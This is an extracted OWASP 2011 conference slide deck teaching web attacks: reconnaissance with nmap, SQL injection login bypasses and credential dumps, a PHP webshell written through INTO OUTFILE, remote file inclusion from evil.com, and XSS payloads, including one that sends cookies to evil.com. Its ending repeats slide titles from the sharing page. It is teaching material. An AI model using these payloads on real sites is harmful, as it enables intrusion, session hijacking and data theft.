Introduction To Ethical Web Application Hacking

OWASP DAY KL 2011, 20 September 2011
Introduction to Ethical Web Application Hacking

Syed Zainudeen
20 Sept 2011
Copyright (C) 2011, Syed Zainudeen.
Overview
Information Gathering SQL Injection File Inclusion XSS (Cross Site Scripting)
20 Sept 2011
Information Gathering
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 3
Finding an apple in a basket will be like finding a needle in a haystack if you dont know what an apple is !
- Syed Zainudeen -
20 Sept 2011
Why we need to know the target?

Speed up the process of finding vulnerabilities Increase the chance of a successful exploitation
20 Sept 2011
What do we want to know?

Address of our target OS type Running services What type of service software Any info on the target
20 Sept 2011
Tools to check IP address

ping (?) nslookup host dig
20 Sept 2011
Tools for OS fingerprinting

nmap
Usage: nmap -O <host> nmap -O www.website.com
xprobe2
Usage: xprobe2 <host> xprobe2 www.website.com
20 Sept 2011
Why we need to know the OS?

Lets say that we found a vulnerability in a system that allows us to execute commands on the remote OS We send the command: net user hacker 123456 /add However, we scratch our head wondering why the command didnt work It WONT work if the target is a linux machine
nmap in action
20 Sept 2011
10
Tools to scan for services

nmap
nmap -sT <host>
TCP Connect scan
nmap -sT www.website.com

SYN scan
nmap -sS www.website.com

UDP scan
nmap -sU www.website.com
amap
(discovering services on nonstandard ports)
amap <host> <port> amap www.website.com 49152

Service software detection tool

Automated:
nmap sV <host>
nmap sV www.website.com
Manual:
nc / telnet/putty
Usage: nc <host> <port>
(text based services)
openssl
(text based services + SSL)
Usage: openssl s_client connect <host>:<port>

HTTP banner grabbing

Example:
Using netcat: nc www.google.com 80
HEAD / HTTP/1.0 Host: www.google.com Using telnet: telnet www.website.com 80 HEAD / HTTP/1.0 Host: www.website.com = Enter
HTTP banner grabbing demo
20 Sept 2011
14
Additional ways to get information

Google Spidering Error messages
20 Sept 2011
15
SQL Injection
SQL injection is like asking for extra plate/tissue/etc when all the waiter is expecting is your order
- Syed Zainudeen -
20 Sept 2011
17
What is SQL injection ?

SQL injection - inserting specially crafted SQL instructions for arbitrary SQL code execution Example:
Inserting ' OR 1=1 # to bypass login page
20 Sept 2011
18
Login bypass
20 Sept 2011
19
Logged in as admin !
20 Sept 2011
20
How did it works ?

Behind the scene, there is an SQL instruction being executed SELECT * FROM accounts WHERE username=' $user ' AND password=' $pass ' $user and $pass and are taken from the input box.
How did it works ? (injection)

SELECT * FROM accounts WHERE username='$user' AND password='$pass' If $user equals ' OR 1=1 # and $pass is null then the SQL instruction will be SELECT * FROM accounts WHERE username=' ' OR 1=1 #' AND password=''
How did it works ? (comment)

# is a special character in MySQL which means line comment (similar to // for C) and anything that follows after it will be ignored
The SQL without the comment is SELECT * FROM accounts WHERE username='' OR 1=1 #' AND password=''
20 Sept 2011
23
How did it works ? (comparison)

SELECT * FROM accounts WHERE username='' OR 1=1 1=1 is a comparison that will result to a boolean value of TRUE (since 1 will always be equal to 1) The OR operator means that either of the condition must be true
How did it works ? (Boolean logic)

Therefore: SELECT * FROM accounts WHERE username='' OR 1=1
Truth table for OR
Condition FALSE or FALSE FALSE or TRUE TRUE or TRUE TRUE or FALSE Result FALSE TRUE TRUE TRUE
Boolean:
OR
TRUE
Means:
OR TRUE equals TRUE
20 Sept 2011
25
How did it works ? (eureka!)

Therefore the statement will always be true and this will be executed SELECT * FROM accounts WHERE username='' OR 1=1
All the rows will be returned but since the first row is the username admin, we logs in as admin
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen.
26
Exploits of a Mom
xkcd.com/327
Spotting a vulnerable application

The easiest way to find an SQL injection vuln is by inserting a single quote ( ' ) An error message will be displayed (if the server is configured to display error) Other possible responses might be:
a blank page a web page with some of the elements missing
20 Sept 2011
28
The single quote test
20 Sept 2011
29
Exploting SQL injection vuln

3 rules of a successful exploitation
Rule 1: The is no master SQL injection string ! Rule 2: Think as a developer ! Rule 3: Try, try and try !
BTW, the rules won't help if you are facing a secure web application
20 Sept 2011
30
Exploitation: Bypassing login page

Common login bypass strings:
' OR 1=1 # ' OR 1=1 -- ' ' OR ''=' ' OR 1=1 OR ' ' OR 1=1 LIMIT 1#
. use your imagination (and logic)
Exploitation example: Login bypass
20 Sept 2011
32
What can be done with SQLi ?

Bypass login page (done !) Displaying private data Install a webshell
20 Sept 2011
33
Displaying private data

DONE using UNION <SQL query> #comment ' union select group_concat(<columns>),2,3 from <table name> #
Examples:
' union select group_concat(user,password),2,3 from users# ' union select group_concat(user,':',password),2,3 from users#
Pwned !
20 Sept 2011
35
Installing a webshell
This is done using SELECT INTO OUTFILE . If we were attacking a xampp installation:
' union select '<?php system($_GET[c]); ?>',2,3 into outfile 'c:/xampp/htdocs/test.php' #

Note: system() is a special PHP function to execute system commands File permission is required in order to use INTO OUTFILE
Pwned !!!
We access the shell through: http://<host>/test.php?c=<OS command>
20 Sept 2011
37
File Inclusion Attack

File injection is akin to how bacteriophage injects bacteria with its genetic material
- Syed Zainudeen -
20 Sept 2011
39
File inclusion in web applications

Sometimes web application developers code their application using separate modules in multiple files When needed, these modules can simply be included into their web app In PHP this is done by using include(), include_once(), require() or require_once()
Sample URL pattern

Sample URL patterns that might use include():
http://website.com/?page=login.php http://website.com/?page=register.php http://website.com/?page=main.php
The site most probably be coded like this

<?php $page = $_GET['page']; include($page); ?>
include()
Include() and other similar function has the ability to include any file to be as part as the script that is currently executing
Depending on the server configuration, include() can access not just local file path, but also web URLs
20 Sept 2011
42
Sample attack
What if an attacker prepares a webshell script <?php system($_GET[c]); ?> and host it at http://evil.com/script.txt
All the attacker needs to do now is to invoke the web application with this URL:
http://website.com/?page=http://evil.com/script.txt &c=ls
Spotting a vulnerable app

All we have to do is prepend the suspected variables (GET/POST/injected variables) with ../
Example: http://abc.com/?page=../register.php
20 Sept 2011
44
Possible target of File Inclusion attack
20 Sept 2011
45
Dot dot slash test in action
20 Sept 2011
46
Types of File Inclusion Attack

There are 2 types of File Inclusion attack Remote File Inclusion (RFI)
Easy to exploit (Very very dangerous !!!)
Local File Inclusion (LFI)

Harder to inject code
20 Sept 2011
47
RFI exploitation
1. Find a vulnerable URL
(e.g. http://192.168.0.1/web/index.php?page=login.php)
2. Host our script on a web server (e.g. http://evil.com/shell.txt) 3. Exploit it (run our script) by requesting
http://192.168.0.1/web/index.php?page=http://evil.co m/shell.txt
RFI exploitation (cont.)

Content of shell.txt
<?php system($_GET[c]); ?>
In order to execute dir command, we can request for the following URL
http://192.168.0.1/web/index.php?page=http://evil .com/shell.txt&c=dir
20 Sept 2011
49
PWNED !!!
20 Sept 2011
50
The LFI dilemma

If a RFI attacks failed, we can opt for LFI But one big question remains,
HOW DO WE GET OUR MALICIOUS SCRIPT TO THE SERVER IN THE FIRST PLACE ?
Getting your script to the server

There are several ways to get your script to the server
File/Image upload /proc/self/environ method Log file poisoning
Once the script is accessible locally by the server, exploitation can proceed.
Cross Site Scripting (XSS)

XSS, malicious content by user, for user

- Syed Zainudeen -
20 Sept 2011
54
What is XSS ?
XSS is a vulnerability that allows an attacker to inject client-side code on a webpage The client-side code can be of any client-side scripting language; Javascript, CSS, HTML, etc
20 Sept 2011
55
How can it happen ?

An attacker inserts specially crafted input string that allow the browser to interpret it as valid code
Example:
What's your name: Ali<script>alert('XSS')</script>
20 Sept 2011
56
XSS in action
20 Sept 2011
57
Types of XSS
There are 2 types of XSS Reflected XSS Stored XSS (non-persistent) (persistent)
20 Sept 2011
58
Reflected vs Stored
In a reflected XSS, the injected string is used only once and discarded (not stored)
E.g. search function
In a stored XSS, the injected string is first stored in a DB and later loaded for display
E.g. forum, guestbook, log
20 Sept 2011
59
Reflected XSS
The vulnerable page will only display user injected script if he/she follows a certain link/URL
The malicious script is visible in the URL (might be in encoded form). For example: http://abc.com/search?q=ball<script>alert(/XSS/)</script>
20 Sept 2011
60
Reflected XSS in action
20 Sept 2011
61
Stored XSS
The vulnerable page will display user injected script just by visiting to a vulnerable site (that has been injected)
The malicious script in not visible in the URL (since it is usually loaded from DB)
20 Sept 2011
62
Stored XSS in action
20 Sept 2011
63
What can we do with XSS?

There's a lot that can be done with XSS vuln
Webpage defacement (?) Cross Site Request Forgery (CSRF) Cookie stealing
20 Sept 2011
64
Webpage defacement
This is effective against stored XSS Creates an illusion of being hacked ! (Not a real hack) The way to deface is up to the creativity of the attacker. Some examples: <script>document.body.innerHTML="Hacked!"</script> <iframe src="http://www.google.com" style="position:absolute; top:0; left:0; width:100% ;height:100%"></iframe>
XSS web defacement (script)
20 Sept 2011
66
XSS web defacement (iframe)
20 Sept 2011
67
Cross Site Request Forgery (CSRF)

CSRF is a type of attack that enables an attacker to do things on behalf of the victim by using the trust that a webpage has on the victim How: The attacker send instructions to a victim, to be executed (by the victim) using session information of the victim.
CSRF explained
Let say that a user is logged in to a bank (Low Security Bank, lsbank.com) A user then browse to other sites that contains the following (XSS injected) code: <img src="http://lsbank.com/transfer?amount=1000&to=hacker_acc &submit=true" />
CSRF explained (cont.)

The img tag will cause a GET request to the bank (lsbank.com) Since the user is currently logged in to the bank, he/she will unknowingly transfer $1000 to hacker_acc XSS + unsecured site = dangerous combination
Cookie stealing
In CSRF, an attacker issues a command that gets executed using session information (cookie) of a victim
The cookie is not captured in CSRF. The attacker doesn't know the victim's cookie.
But using XSS, we can steal user cookie
Why cookie is important ?

When we log in to a website, the only way that the site knows who we are is based on the cookie information that our browser send.
If an attacker is able to steal cookie data from a victim, the attacker can basically do anything as the victim
20 Sept 2011
72
Limitation of XSS cookie stealing

XSS can be used to steal cookie but is has a limitation. XSS can only be used to steal user cookie of the site that is vulnerable to XSS Let say that facebook.com has an XSS vuln, an attacker can steal user cookie for facebook.com and use it to log in as the victim.
How to read cookie value?

Javascript can be used to read user cookie We can view cookie data by using: alert(document.cookie); document.cookie is a javascript variable that can view all non HTTP-Only cookie
Displaying user cookie
20 Sept 2011
75
XSS cookie stealing

An attacker can steal user cookie by using: <script> document.write('<img src="http://evil.com/?dat=' + escape(document.cookie) + ' " /> '); </script>
This script will cause the user cookie to be sent to evil.com The attacker can log the cookies using any server side scripting language at evil.com
Modifying browser cookie

The stolen cookies can then be retrieved and injected to the attacker's web browser There are many ways to modify a browser's cookie
Manually
javascript injection at the address bar
Using automated tools

Firecookie browser extension TamperData Paros proxy etc
20 Sept 2011
77
Browsing with stolen cookie

Once the victim's cookie have been planted, all that needs to be done is simply point the browser to the target site The attacker's browser will present the stolen cookie to the web server and possibly, the web server will identify the request as coming from the victim
The attacker just hijacked the victim's session using XSS !

How session hijacking works

SESSIONID=i45h0t3w4h Web Admin Web server
Normal User
20 Sept 2011
Each user has unique session ID stored in their browser's cookie. The web server uses the session ID to differentiate between normal user and web admin
Copyright (C) 2011, Syed Zainudeen. 79
How session hijacking works (cont.)

SESSIONID=i45h0t3w4h
Attacker Evil.com
Due to an XSS vulnerability in Web Server, an attacker has injected some javascript code that steals visitor's session ID . 20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 80
How session hijacking works (cont.)

Attacker
20 Sept 2011
The attacker then uses the stolen session ID to communicate with the web server. The attacker will be treated as the Web Admin and can do whatever the Web Admin can, since he/she has the session ID of the Copyright (C) 2011, Syed Zainudeen.Web Admin. 81
Thank you !
20 Sept 2011
82

Introduction To Ethical Web Application Hacking

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Introduction To Ethical Web Application Hacking

Uploaded by

Copyright:

Available Formats

OWASP DAY KL 2011, 20 September 2011

Introduction to Ethical Web Application Hacking

Copyright (C) 2011, Syed Zainudeen.

Copyright (C) 2011, Syed Zainudeen.

Copyright (C) 2011, Syed Zainudeen.

Why we need to know the target?

Copyright (C) 2011, Syed Zainudeen.

What do we want to know?

Copyright (C) 2011, Syed Zainudeen.

Tools to check IP address

Copyright (C) 2011, Syed Zainudeen.

Tools for OS fingerprinting

Copyright (C) 2011, Syed Zainudeen.

Why we need to know the OS?

Copyright (C) 2011, Syed Zainudeen.

Tools to scan for services

nmap -sT www.website.com

nmap -sS www.website.com

nmap -sU www.website.com

(discovering services on nonstandard ports)

amap <host> <port> amap www.website.com 49152

Service software detection tool

(text based services)

(text based services + SSL)

Usage: openssl s_client connect <host>:<port>

HTTP banner grabbing

HTTP banner grabbing demo

Copyright (C) 2011, Syed Zainudeen.

Additional ways to get information

Copyright (C) 2011, Syed Zainudeen.

Copyright (C) 2011, Syed Zainudeen.

What is SQL injection ?

Copyright (C) 2011, Syed Zainudeen.

Copyright (C) 2011, Syed Zainudeen.

Copyright (C) 2011, Syed Zainudeen.

How did it works ?

How did it works ? (injection)

How did it works ? (comment)

Copyright (C) 2011, Syed Zainudeen.

How did it works ? (comparison)

How did it works ? (Boolean logic)

OR TRUE equals TRUE

Copyright (C) 2011, Syed Zainudeen.

How did it works ? (eureka!)

Spotting a vulnerable application

Copyright (C) 2011, Syed Zainudeen.

The single quote test

Copyright (C) 2011, Syed Zainudeen.

Exploting SQL injection vuln

Copyright (C) 2011, Syed Zainudeen.

Exploitation: Bypassing login page

Exploitation example: Login bypass

Copyright (C) 2011, Syed Zainudeen.

What can be done with SQLi ?

Copyright (C) 2011, Syed Zainudeen.

Displaying private data

Copyright (C) 2011, Syed Zainudeen.

' union select '<?php system($_GET[c]); ?>',2,3 into outfile 'c:/xampp/htdocs/test.php' #

Copyright (C) 2011, Syed Zainudeen.

File Inclusion Attack

Copyright (C) 2011, Syed Zainudeen.

File inclusion in web applications